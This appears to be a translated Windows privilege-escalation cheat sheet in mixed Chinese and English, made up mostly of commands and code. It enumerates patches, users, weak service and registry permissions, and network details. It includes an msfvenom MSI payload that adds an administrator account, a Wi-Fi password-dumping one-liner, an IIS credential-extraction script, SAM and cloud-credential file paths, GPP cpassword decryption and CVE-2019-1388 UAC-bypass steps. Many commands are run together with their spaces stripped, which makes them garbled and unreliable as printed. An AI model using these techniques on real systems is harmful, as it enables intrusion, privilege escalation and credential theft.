systeminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get system architecture
[System.Environment]::OSVersion.Version #Current OS versionGet-WmiObject-query'select * from win32_quickfixengineering'| foreach {$_.hotfixid} #List all patchesGet-Hotfix-description"Security update"#List only "Security Update" patches
版本漏洞
这个 网站 对于搜索有关 Microsoft 安全漏洞的详细信息非常有用。这个数据库包含超过 4,700 个安全漏洞,显示了 Windows 环境所呈现的 庞大攻击面。
ConsoleHost_history#Find the PATH where is savedtype%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttypeC:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttype $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtcat (Get-PSReadlineOption).HistorySavePathcat (Get-PSReadlineOption).HistorySavePath |slspassw
#Check is enable in the registryregqueryHKCU\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptiondirC:\Transcripts#Start a Transcription sessionStart-Transcript-Path"C:\transcripts\transcript0.txt"-NoClobberStop-Transcript
msfvenom-pwindows/adduserUSER=rottenadminPASS=P@ssword123!-fmsi-nouac-oalwe.msi#No uac formatmsfvenom-pwindows/adduserUSER=rottenadminPASS=P@ssword123!-fmsi-oalwe.msi#Using the msiexec the uac wont be prompted
# CMDnetusers%username%#Menetusers#All local usersnetlocalgroup#GroupsnetlocalgroupAdministrators#Who is inside Administrators groupwhoami/all#Check the privileges# PSGet-WmiObject-ClassWin32_UserAccountGet-LocalUser|ftName,Enabled,LastLogonGet-ChildItemC:\Users-Force|select NameGet-LocalGroupMemberAdministrators|ftName,PrincipalSource
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (icacls"%%z"2>nul |findstr/i"(F) (M) (W) :\\"|findstr/i":\\ everyone authenticated users todos %username%"&&echo.))
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txtfor /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a"2>nul |findstr"(M) (F) :\"
您还可以使用 sc 和 icacls:
scquerystate=all|findstr"SERVICE_NAME:">>C:\Temp\Servicenames.txtFOR/F"tokens=2 delims= "%iin (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txtFOR/F%iin (C:\Temp\services.txt) DO @sc qc %i |findstr"BINARY_PATH_NAME">>C:\Temp\path.txt
服务注册表修改权限
您应该检查是否可以修改任何服务注册表。
您可以通过以下方式检查您对服务注册表的权限:
regqueryhklm\System\CurrentControlSet\Services/s/vimagepath#Get the binary paths of the services#Try to write every service with its current content (to check if you have write permissions)for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul ®save%a%temp%\reg.hiv2>nul&®restore%a%temp%\reg.hiv2>nul&&echoYoucanmodify%aget-aclHKLM:\System\CurrentControlSet\services\* |Format-List*|findstr/i"<Username> Users Path Everyone"
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"| findstr /i /v '\"'wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\"|findstr /i /v '\"'# Not only auto services# Using PowerUp.ps1Get-ServiceUnquoted-Verbose
accesschk.exe/accepteula# Find all weak folder permissions per drive.accesschk.exe-uwdqsUsersc:\accesschk.exe -uwdqs"Authenticated Users"c:\accesschk.exe -uwdqs"Everyone"c:\# Find all weak file permissions per drive.accesschk.exe-uwqsUsersc:\*.*accesschk.exe-uwqs"Authenticated Users"c:\*.*accesschk.exe-uwdqs"Everyone"c:\*.*
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
hosts file
检查 hosts 文件中硬编码的其他已知计算机
type C:\Windows\System32\drivers\etc\hosts
网络接口与DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
开放端口
检查外部的 受限服务
netstat-ano#Opened ports?
路由表
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP 表
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
dir C:\Users\username\AppData\Local\Microsoft\Credentials\dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\Get-ChildItem-Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\Get-ChildItem-Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
#List saved Wifi usingnetshwlanshowprofile#To get the clear-text password usenetshwlanshowprofile<SSID>key=clear#Oneliner to extract all wifi passwordscls&echo.&for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netshwlanshowprofilesname="%b"key=clear|findstr"SSID Cipher Content"|find/v"Number"&echo.) &@echoon*
保存的 RDP 连接
您可以在 HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
和 HKCU\Software\Microsoft\Terminal Server Client\Servers\ 中找到它们。
functionGet-ApplicationHost {$OrigError = $ErrorActionPreference$ErrorActionPreference = "SilentlyContinue"# Check if appcmd.exe existsif (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {# Create data table to house results$DataTable = New-Object System.Data.DataTable# Create and name columns in the data table$Null = $DataTable.Columns.Add("user")$Null = $DataTable.Columns.Add("pass")$Null = $DataTable.Columns.Add("type")$Null = $DataTable.Columns.Add("vdir")$Null = $DataTable.Columns.Add("apppool")# Get list of application poolsInvoke-Expression"$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name"|ForEach-Object{# Get application pool name$PoolName = $_# Get username$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"$PoolUser = Invoke-Expression $PoolUserCmd# Get password$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"$PoolPassword = Invoke-Expression $PoolPasswordCmd# Check if credentials existsif (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {# Add credentials to database$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)}}# Get list of virtual directoriesInvoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" |ForEach-Object{# Get Virtual Directory Name$VdirName = $_# Get username$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"$VdirUser = Invoke-Expression $VdirUserCmd# Get password$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"$VdirPassword = Invoke-Expression $VdirPasswordCmd# Check if credentials existsif (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {# Add credentials to database$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')}}# Check if any passwords were foundif( $DataTable.rows.Count-gt0 ) {# Display results in list view that can feed into the pipeline$DataTable |Sort-Objecttype,user,pass,vdir,apppool|Select-Objectuser,pass,type,vdir,apppool-Unique}else {# Status userWrite-Verbose 'No application pool or virtual directory passwords were found.'$False}}else {Write-Verbose 'Appcmd.exe does not exist in the default location.'$False}$ErrorActionPreference = $OrigError}
regquery"HKCU\Software\SimonTatham\PuTTY\Sessions"/s|findstr"HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"#Check the values saved in each session, user/password could be there
# Usually %SYSTEMROOT% = C:\Windows%SYSTEMROOT%\repair\SAM%SYSTEMROOT%\System32\config\RegBack\SAM%SYSTEMROOT%\System32\config\SAM%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\SYSTEM%SYSTEMROOT%\System32\config\RegBack\system
云凭证
#From user home.aws\credentialsAppData\Roaming\gcloud\credentials.dbAppData\Roaming\gcloud\legacy_credentialsAppData\Roaming\gcloud\access_tokens.db.azure\accessTokens.json.azure\azureProfile.json
McAfee SiteList.xml
搜索名为 SiteList.xml 的文件
Cached GPP Pasword
之前有一个功能,允许通过组策略首选项(GPP)在一组机器上部署自定义本地管理员帐户。然而,这种方法存在重大安全缺陷。首先,存储在 SYSVOL 中的组策略对象(GPO)作为 XML 文件,可以被任何域用户访问。其次,这些 GPP 中的密码使用公开文档的默认密钥以 AES256 加密,任何经过身份验证的用户都可以解密。这构成了严重风险,因为这可能允许用户获得提升的权限。
在 C:\ProgramData\Microsoft\Group Policy\history 或 C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history(在 W Vista 之前) 中搜索这些文件:
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
要解密 cPassword:
#To decrypt these passwords you can decrypt it usinggpp-decryptj1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
从低权限用户到 NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC 绕过
如果您可以访问图形界面(通过控制台或 RDP),并且 UAC 已启用,在某些版本的 Microsoft Windows 中,可以从无权限用户运行终端或任何其他进程,例如 "NT\AUTHORITY SYSTEM"。
这使得可以在同一漏洞下同时提升权限并绕过 UAC。此外,无需安装任何东西,过程中使用的二进制文件由 Microsoft 签名并发布。
一些受影响的系统如下:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
要利用此漏洞,必须执行以下步骤:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
From SeDebug + SeImpersonate to Full Token privileges
如果您拥有这些令牌权限(您可能会在已经是高完整性进程中找到),您将能够打开几乎任何进程(非受保护进程),使用 SeDebug 权限,复制该进程的令牌,并创建一个具有该令牌的任意进程。
使用此技术通常选择任何以 SYSTEM 身份运行的进程,具有所有令牌权限(是的,您可以找到没有所有令牌权限的 SYSTEM 进程)。
您可以在这里找到执行所提议技术的代码示例。